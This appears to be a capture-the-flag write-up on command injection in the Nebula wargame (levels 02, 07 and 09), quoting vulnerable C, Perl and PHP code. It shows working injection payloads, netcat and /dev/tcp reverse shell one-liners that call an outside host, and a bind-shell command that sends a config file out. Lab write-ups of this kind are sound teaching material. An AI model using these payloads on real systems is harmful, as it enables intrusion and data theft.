Command Execute Functions in C
system()
execl()
execlp()
execv()
execvp()
execle()
execve()
popen()
etc...
Nebula Level02 [ Description ]
Vulnerble Code
char *buffer;
buffer = NULL;
asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
printf("about to call system(\"%s\")\n", buffer);
system(buffer);
Getting environment variable "USER" and about to execute this string
Export USER with random value and Running Program
level02@nebula:~$ export USER=aaaa
level02@nebula:~$ /home/flag02/flag02
about to call system("/bin/echo aaaa is cool")
aaaa is cool
Running two Command in Linux ( Many ways )
level02@nebula:~$ id;whoami
uid=1003(level02) gid=1003(level02) groups=1003(level02)
level02
Command Injection and Solving Level02
/bin/echo [INPUT] is cool
/bin/echo Break;getflag;echo is cool
level02@nebula:~$ unset USER
level02@nebula:~$ export USER="Break;getflag;echo"
level02@nebula:~$ /home/flag02/flag02
about to call system("/bin/echo Break;getflag;echo is cool")
Break
You have successfully executed getflag on a target account
is cool
Nebula Level07 [ Description ]
Vulnerable Code
#!/usr/bin/perl
use CGI qw{param};
print "Content-type: text/html\n\n";
sub ping {
$host = $_[0]; print("<html><head><title>Ping results</title></head><body><pre>");
@output = `ping -c 3 $host 2>&1`; foreach $line (@output) {
print "$line"; }
print("</pre></body></html>");
}
# check if Host set. if not, display normal page, etc
ping(param("Host"));
Backticks is alternative way to execute command in PERL [ Ref ] Running Port
tcp6 0 0 :::7007 :::* LISTEN
HTTP Requests from My Windows Host
$ curl http://192.168.43.229:7007/index.cgi?Host=192.168.43.234
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 57 0 57 0 0 9 0 --:--:-- 0:00:06 --:--:-- 0
Command Injection
ping -c 3 $host 2>&1
ping -c 3 [ INPUT ] 2>&1
ping -c 3 ; getflag 2>&1 #No Result
#Final Payload
127.0.0.1%3bgetflag
Result
thinb@DESKTOP-U4MGHBB ~
$ curl http://192.168.43.229:7007/index.cgi?Host=127.0.0.1%3Bgetflag
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 504 0 504 0 0 252 0 --:--:-- 0:00:02 --:--:-- 246
<html><head><title>Ping results</title></head><body><pre>PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_req=1 ttl=64 time=0.023 ms
64 bytes from 127.0.0.1: icmp_req=2 ttl=64 time=0.021 ms
64 bytes from 127.0.0.1: icmp_req=3 ttl=64 time=0.030 ms
--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1998ms
rtt min/avg/max/mdev = 0.021/0.024/0.030/0.006 ms
You have successfully executed getflag on a target account
</pre></body></html>
Netcat TCP Reverse Shell ( Blind Command Injection ) Listenting on My Computer
nc -lvp1234
Giving a Shell with e
nc -e /bin/bash 192.168.43.234 1234
Without e
mknod /tmp/backpipe p/bin/sh 0</tmp/backpipe | nc **attacker_ip** 4444 1>/tmp/backpipe
Using Dev
127.0.0.1; bash -i >& /dev/tcp/192.168.43.234/1234 0>&1;
Don't need for Nebula 007
Data Exfiltration with Bind Shell ( if we need to read flag )
nc –l –p {port} < {file/to/extract}
127.0.0.1; nc.traditional -l -p 1234 < thttpd.conf
Payload
curl http://192.168.43.229:7007/index.cgi?Host=127.0.0.1%3B%20nc.traditional%20-l%20-p%201234%20%3C%20thttpd.conf
Connect
C:\Users\thinb>nc 192.168.43.229 1234
# /etc/thttpd/thttpd.conf: thttpd configuration file
# This file is for thttpd processes created by /etc/init.d/thttpd.
# Commentary is based closely on the thttpd(8) 2.25b manpage, by Jef Poskanzer.
# Specifies an alternate port number to listen on.
port=7007
# Specifies a directory to chdir() to at startup. This is merely a convenience -
# you could just as easily do a cd in the shell script that invokes the program.
dir=/home/flag07
Nebula Level09 [ Description ]
Vulnerable Code PHP
$contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);
I already explained in LOL Free Web Security Class. [ Watch Here ]
Other Command Injection Python Sandbox Escape ( Read More )
os.system ()
os.popen ()
ommands.getstatusoutput()
commands.getoutput()
commands.getstatus()
subprocess.call(command, shell=True)
subprocess.Popen(command, shell=True)
pty.spawn()
Python Pickle Command Injection ( DIY )
Level 17 in Nebula -> Do it yourself
Level 12 in Nebula -> DIY ( Python popen)
References
https://blog.securityinnovation.com/blog/2011/06/how-to-test-for-command-injection.html
http://man7.org/linux/man-pages/man3/asprintf.3.html
https://www.perlmonks.org/?node_id=380670
https://medium.com/@shadowslayerqwerty/creating-a-netcat-reverse-shell-without-e-89b45134de99
https://www.contextis.com/us/blog/data-exfiltration-via-blind-os-command-injection